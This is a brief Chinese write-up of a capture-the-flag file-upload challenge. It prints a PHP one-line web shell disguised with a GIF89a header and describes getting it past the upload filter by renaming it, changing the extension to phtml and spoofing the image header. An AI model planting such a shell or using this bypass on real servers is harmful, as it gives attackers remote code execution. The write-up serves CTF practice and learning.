[极客大挑战 2019]Knife——3.20BUUCTF练习day4(2)

[极客大挑战 2019]Knife------3.20BUUCTF练习day4(2)

解题内容

在一个文件中输入以下内容,该文件是phtml文件(HTML嵌套PHP代码,可以绕过很多限制)但在本题中要先改文件名为2.gif然后抓包修改后缀名为phtml,因为只可以上传gif和jpg等

php 复制代码
GIF89a
<script language='php'>@eval($_POST[shell]);</script>



蚁剑连接

看了别人的wp,发现还可以删除前端校验函数,直接传phtml文件也可以


拓展

在上传的文件代码中含有GIF89a,这个是在文件前加上GIF89a来绕过PHP getimagesize的检查,来绕过文件内容头校验

PHP getimagesize(服务器端验证)

读取文件头信息,不是解析整个图片,所以效率较高

相关推荐
终焉暴龙王7 小时前
CTFHub web进阶 php Bypass disable_function通关攻略
开发语言·安全·web安全·php
百川8 小时前
Apache文件解析漏洞
web安全·apache
小鼻崽纸15 小时前
cacti漏洞CVE-2022-46169的复现
php
希望奇迹很安静15 小时前
SSRF_XXE_RCE_反序列化学习
学习·web安全·ctf·渗透测试学习
程序员编程指南18 小时前
Qt 网络编程进阶:网络安全与加密
c语言·网络·c++·qt·web安全
Johny_Zhao18 小时前
Centos8搭建hadoop高可用集群
linux·hadoop·python·网络安全·信息安全·云计算·shell·yum源·系统运维·itsm
stand_forever20 小时前
laravel框架优化
php·laravel
Python涛哥1 天前
PHP框架之Laravel框架教程:1. laravel搭建
开发语言·php·laravel
大白玉米1 天前
TVBOXOS6.0双端APP二开源码完整版全开源源码重构版
java·重构·php
北极光SD-WAN组网1 天前
工业互联网时代,如何通过混合SD-WAN提升煤炭行业智能化网络安全
网络·安全·web安全